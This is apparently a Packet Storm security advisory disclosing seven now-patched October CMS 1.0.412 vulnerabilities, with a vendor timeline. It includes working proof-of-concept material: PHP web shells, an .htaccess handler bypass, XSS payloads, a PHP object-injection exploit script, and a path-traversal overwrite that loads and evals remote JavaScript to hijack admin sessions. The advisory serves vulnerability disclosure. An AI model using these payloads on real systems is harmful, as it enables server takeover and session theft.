October CMS 1.0.412 Code Execution / Shell Upload

2017-04-20T00:00:00
ID PACKETSTORM:142239
Type packetstorm
Reporter Anti Rais
Modified 2017-04-20T00:00:00

Description

                                        
                                            `October CMS v1.0.412 several vulnerabilities  
############################################  
  
  
Information  
===========  
  
Name: October CMS v1.0.412 (build 412)  
Homepage: http://octobercms.com  
Vulnerability: several issues, including PHP code execution  
Prerequisites: attacker has to be authenticated user with media or asset  
management permission  
CVE: pending  
  
Credit: Anti RA$?is  
HTML version: https://bitflipper.eu  
  
  
Product  
=======  
  
October is a free, open-source, self-hosted CMS platform based on the  
Laravel  
PHP Framework.  
  
  
Description  
===========  
  
October CMS build 412 contains several vulnerabilities. Some of them  
allow an  
attacker to execute PHP code on the server. Following issues have been  
identified:  
  
1. PHP upload protection bypass  
2. Apache .htaccess upload  
3. stored WCI in image name  
4. reflected WCI while displaying project ID  
5. PHP code execution via asset management  
6. delete file via PHP object injection  
7. asset save path modification  
  
  
Proof of Concepts  
=================  
  
1. PHP upload protection bypass  
-------------------------------  
  
Authenticated user with permission to upload and manage media contents can  
upload various files on the server. Application prevents the user from  
uploading PHP code by checking the file extension. It uses black-list based  
approach, as seen in octobercms/vendor/october/rain/src/Filesystem/  
Definitions.php:blockedExtensions().  
  
==================== source start ========================  
106 <?php  
107 protected function blockedExtensions()  
108 {  
109 return [  
110 // redacted  
111 'php',  
112 'php3',  
113 'php4',  
114 'phtml',  
115 // redacted  
116 ];  
117 }  
==================== source end ========================  
  
We can easily bypass file upload restriction on those systems by using an  
alternative extension, e.g if we upload sh.php5 on the server:  
  
==================== source start ========================  
<?php $_REQUEST['x']($_REQUEST['c']);  
==================== source end ========================  
  
Code can be execute by making a following request:  
http://victim.site/storage/app/media/sh.php5?x=system&c=pwd  
  
2. Apache .htaccess upload  
--------------------------  
  
As described in the PHP upload protection bypass section, the  
application uses  
black-list based defense. It does not prevent the attacker from uploading a  
.htaccess files which makes it exploitable on Apache servers. Attacker  
can use  
it to add another handler for PHP files and upload code under an alternative  
name. Attacker has to first upload the .htaccess configuration file with  
following settings:  
  
==================== source start ========================  
AddHandler application/x-httpd-php .z  
==================== source end ========================  
  
This will execute all .z files as PHP and after uploading a code named  
sh.z to  
the server. It can be used to execute code as described previously.  
  
3. stored WCI in image name  
---------------------------  
  
Authenticated user, with permission to customize back-end settings, can  
store  
WCI payload in the image name. The functionality is located at:  
  
Settings -> Customize Back-end -> Brand Logo -> (upload logo) ->  
(edit name) -> (add title)  
  
Set the name to following value:  
  
==================== source start ========================  
"><script>alert("stored WCI")</script x="  
==================== source end ========================  
  
Payload is executed when the victim clicks on the image name to edit it.  
  
When the administrator edits user's profile image, attacker's payload is  
executed, allowing him to execute JavaScript during administrator's active  
session. This can be used, for example, to give another user a "super-user"  
permission.  
  
4. reflected WCI while displaying project ID  
--------------------------------------------  
  
Authenticated user with permission to manage software updates can "Attach  
Project". When invalid value is provided, the error message doesn't properly  
escape the given value, which allows an attacker to execute code. Since it  
requires the victim to paste or write the payload in the input field,  
then it  
isn't easily exploitable.  
  
==================== source start ========================  
"><script>alert(1)</script x="  
==================== source end ========================  
  
5. PHP code execution via asset management  
------------------------------------------  
  
Authenticated user with permission to manage website assets, can use this  
functionality to upload PHP code and execute it on the server.  
  
Asset management URL: http://victim.site/backend/cms.  
Functionality is located at: CMS -> Assets -> Add -> Create file.  
  
First, attacker creates a new asset test.js with the following content:  
  
==================== source start ========================  
<pre><?php if(isset($_REQUEST['x'])){echo system($_REQUEST['x']);}?></pre>  
==================== source end ========================  
  
After saving the file, attacker renames it to test.php5 by clicking on ">_"  
icon on the newly created file. Modal window opens which allows to specify a  
new filename.  
  
URL to execute PHP code:  
http://victim.site/themes/demo/assets/test.php5?x=ls%20-lah  
  
6. delete file via PHP object injection  
---------------------------------------  
  
Authenticated user with "Create, modify and delete CMS partials" or "Create,  
modify and delete CMS layouts" can move assets to different folders. This  
functionality is vulnerable to PHP object injection. User input is read from  
selectedList parameter on line 11 and passed as argument to unserialize().  
Unserialized array object is passed to validatePath() on line 32.  
  
==================== source start ========================  
1 <?php namespace Cms\Widgets;  
2  
3 class AssetList extends WidgetBase  
4 {  
5 // redacted  
6  
7 public function onMove()  
8 {  
9 $this->validateRequestTheme();  
10  
11 $selectedList = Input::get('selectedList');  
12 if (!strlen($selectedList)) {  
13 throw new ApplicationException(  
Lang::get('cms::lang.asset.selected_files_not_found'));  
14 }  
15  
16 $destinationDir = Input::get('dest');  
17 if (!strlen($destinationDir)) {  
18 throw new ApplicationException(  
Lang::get('cms::lang.asset.select_destination_dir'));  
19 }  
20  
21 $destinationFullPath = $this->getFullPath($destinationDir);  
22 if (!file_exists($destinationFullPath) ||  
!is_dir($destinationFullPath)) {  
23 throw new ApplicationException(  
Lang::get('cms::lang.asset.destination_not_found'));  
24 }  
25  
26 $list = @unserialize(@base64_decode($selectedList));  
27 if ($list === false) {  
28 throw new ApplicationException(  
Lang::get('cms::lang.asset.selected_files_not_found'));  
29 }  
30  
31 foreach ($list as $path) {  
32 if (!$this->validatePath($path)) {  
33 throw new ApplicationException(  
Lang::get('cms::lang.asset.invalid_path'));  
34 }  
35  
36 // ...  
==================== source end ========================  
  
Following PHP exploit uses the vulnerability. It requires an authenticated  
user's session to execute as described previously.  
  
==================== source start ========================  
<?php  
  
class Swift_Mime_SimpleHeaderSet {}  
  
class Swift_KeyCache_DiskKeyCache  
{  
private $_keys;  
  
public function __construct($path, $filename) {  
$this->_keys = [$path => [ $filename => null]];  
}  
}  
  
class Swift_Mime_SimpleMimeEntity {  
private $_headers;  
private $_cache;  
private $_cacheKey;  
  
public function __construct($filename, $path = '') {  
$this->_headers = new Swift_Mime_SimpleHeaderSet();  
$this->_cache = new Swift_KeyCache_DiskKeyCache($path,  
$filename);  
$this->_cacheKey = $path;  
}  
}  
  
function payload($filename) {  
$builder = new Swift_Mime_SimpleMimeEntity($filename);  
return base64_encode(serialize([$builder]));  
}  
  
function http($config) {  
$ch = curl_init($config['url']);  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,  
http_build_query($config['data']));  
curl_setopt($ch, CURLOPT_HTTPHEADER, $config['headers']);  
curl_setopt($ch, CURLOPT_COOKIE, $config['cookies']);  
curl_setopt($ch, CURLOPT_PROXY, $config['proxy']);  
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
curl_setopt($ch, CURLOPT_HEADER, false);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
  
return curl_exec($ch);  
}  
  
function get_config($url, $filename, $session) {  
return [  
'url' => $url.'/backend/cms',  
'data' => [  
'dest' => '/',  
'theme' => 'demo',  
'selectedList' => payload($filename),  
],  
'headers' => [  
'X-OCTOBER-REQUEST-HANDLER: assetList::onMove',  
'X-Requested-With: XMLHttpRequest',  
],  
'cookies' => 'admin_auth='.$session,  
'proxy' => 'localhost:8080',  
];  
}  
  
$url = 'http://victim.site';  
$session = '<specify admin_auth cookie value here>';  
$filename = '/tmp/target.txt';  
  
echo http(get_config($url, $filename, $session));  
==================== source end ========================  
  
7. asset save path modification  
-------------------------------  
  
Authenticated user, with permission to manage website assets, can modify the  
path the file is saved to. This allows an attacker to save css, js, less,  
sass, scss files at different locations. Attacker can possibly use it to  
execute JavaScript on the site, if the application tries to require an  
file on  
the server that does not exist or the attacker manages to delete the file  
beforehand. When an attacker creates a new asset, then the following request  
is made.  
  
Asset management URL: http://victim.site/backend/cms.  
Functionality is located at: CMS -> Assets -> Add -> Create file.  
  
==================== request ========================  
POST /backend/cms HTTP/1.1  
Host: victim.site  
Content-Length: 817  
Content-Type: application/x-www-form-urlencoded  
X-OCTOBER-REQUEST-HANDLER: onSave  
X-Requested-With: XMLHttpRequest  
Cookie: admin_auth=...;  
Connection: close  
  
fileName=test.js&content=test&templateType=asset&theme=demo  
==================== request end ====================  
  
The parameter fileName isn't validated and allows an attacker to specify an  
path where the file should be saved to. Overwriting files is forbidden.  
If we  
specify the file name as ../../../test.js then we can assert that the  
file is  
created at the root of site's web directory.  
  
We can execute JavaScript by combining this issue with file deletion  
vulnerability via POI. For that, we are going to replace the  
modules/backend/  
assets/js/vendor/jquery.min.js file with our own content. It is loaded  
on the  
page for every authenticated user and allows us as an attacker to take  
control  
of their session. The payload for this example is the following:  
  
==================== source start ========================  
var c = new XMLHttpRequest();  
c.open('GET', 'https://code.jquery.com/jquery-1.11.1.js', false);  
c.onreadystatechange = () => eval(c.responseText);  
c.send();  
var h = () => {location.hash = 'Hacked: ' + (new Date())};  
setInterval(h, 1000);  
==================== source end ========================  
  
After we delete the jquery.min.js file on the server, we create a new asset  
with the payload as the content.  
  
==================== request ========================  
POST /backend/cms HTTP/1.1  
Host: victim.site  
Content-Length: 371  
Content-Type: application/x-www-form-urlencoded  
X-OCTOBER-REQUEST-HANDLER: onSave  
X-Requested-With: XMLHttpRequest  
Cookie: admin_auth=...;  
Connection: close  
  
fileName=../../../modules/backend/assets/js/vendor/jquery.min.js&content=  
var+c+%3d+new+XMLHttpRequest()%3b  
c.open('GET',+'https%3a//code.jquery.com/jquery-1.11.1.js',+false)%3b  
c.onreadystatechange+%3d+()+%3d>+eval(c.responseText)%3b  
c.send()%3b  
var+h+%3d+()+%3d>+{location.hash+%3d+'Hacked%3a+'+%2b+(new+Date())}%3b  
setInterval(h,+1000)%3b  
&templateType=asset&theme=demo  
==================== request end ====================  
  
After the victim authenticates, the payload is executed. For this  
example, it  
changes the URL hash every second, but can be used to take control of the  
victims session.  
  
  
Conclusion  
==========  
  
Authenticated user with permission to manage website assets, upload and  
manage  
media contents or customize back-end settings can use vulnerabilities found  
there to execute PHP code on the server and take control of the application.  
  
New release v1.0.413 has been made available as a result:  
  
https://octobercms.com/support/article/rn-8  
https://github.com/octobercms/october/releases/tag/v1.0.413.  
  
  
Timeline  
========  
  
05.04.2017 | me > developer | first vulnerability discovered  
06.04.2017 | me > developer | initial contact  
07.04.2017 | me > developer | sent PoC  
09.04.2017 | developer > me | developer implemented patches;  
requested additional information  
09.04.2017 | me > developer | sent PoC with additional information  
and findings  
10.04.2017 | developer > me | all issues were patched  
11.04.2017 | developer > public | new release  
11.04.2017 | me > DWF | CVE request  
12.04.2017 | me > public | full disclosure  
  
---  
Anti RA$?is  
Blog: https://bitflipper.eu  
Pentester at http://www.clarifiedsecurity.com  
  
`